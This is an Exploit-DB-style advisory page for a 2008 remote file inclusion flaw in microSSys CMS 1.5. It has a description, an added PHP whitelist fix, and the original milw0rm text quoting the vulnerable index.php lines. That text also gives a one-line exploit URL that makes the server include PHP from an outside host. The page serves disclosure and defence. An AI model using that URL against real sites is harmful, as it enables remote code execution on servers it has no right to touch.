Vendor: microSSys CMS
By: Raz0r
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: microSSys CMS
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:wajox:microssys_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

microSSys CMS <= 1.5 Remote File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the '1' and 'PAGES[lol]' parameters to the 'index.php' script. This can be exploited to execute arbitrary PHP code by including a remote file with a specially crafted URL.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
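
One way to apply this advice to the index.php lines quoted in the raw advisory, as an added example that is not microSSys code: the page map is a constant defined by the script, and the request value is used only as a lookup key. The page names other than main, the pages/ directory and resolve_page() are hypothetical, and the example assumes the flaw arises because $PAGES is not initialised by the script before use, which the page does not state.

```php
<?php
// Added example, not microSSys code. Page names other than "main", the
// pages/ directory and resolve_page() are hypothetical.

// The page map is a constant defined by the script itself, so a request
// parameter such as PAGES[x] can never add or overwrite an entry.
const PAGE_MAP = [
    'main'    => 'main.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';

/** Map request parameter "1" to a file inside PAGE_DIR; null if not allowed. */
function resolve_page(array $request): ?string
{
    $key = $request['1'] ?? 'main';

    // ?1[]=x arrives as an array; only plain string keys in the map pass.
    if (!is_string($key) || !array_key_exists($key, PAGE_MAP)) {
        return null;
    }

    // The path comes from the constant map value, never from request data.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGE_MAP[$key]);

    // Defence in depth: file must exist and resolve inside PAGE_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET);
if ($page === null) {
    http_response_code(404);
    exit('Page not found'); // the original includes TH.txt at this point
}
include $page; // no @ prefix: include failures should reach the error log
```

Keeping `allow_url_include = Off` in php.ini additionally stops `include` from fetching http:// URLs even if a request-controlled path slips through elsewhere.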

Exploit-DB raw data:

## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
## Software site: http://wajox.com/
## ===============================================================
##                   By Raz0r (www.Raz0r.name)
## ===============================================================
## Vulnerable code (index.php@22-25,54-55):
## [22] if(isset($_REQUEST["1"])){
## [23] $P=$_REQUEST["1"];}else{
## [24] $P="main";
## [25] }
## [..]
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}
## [55] @include($PAGES[$P]);
## Nice...
## ===============================================================
## Exploit:
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
## =============================================================== 

# milw0rm.com [2008-05-19]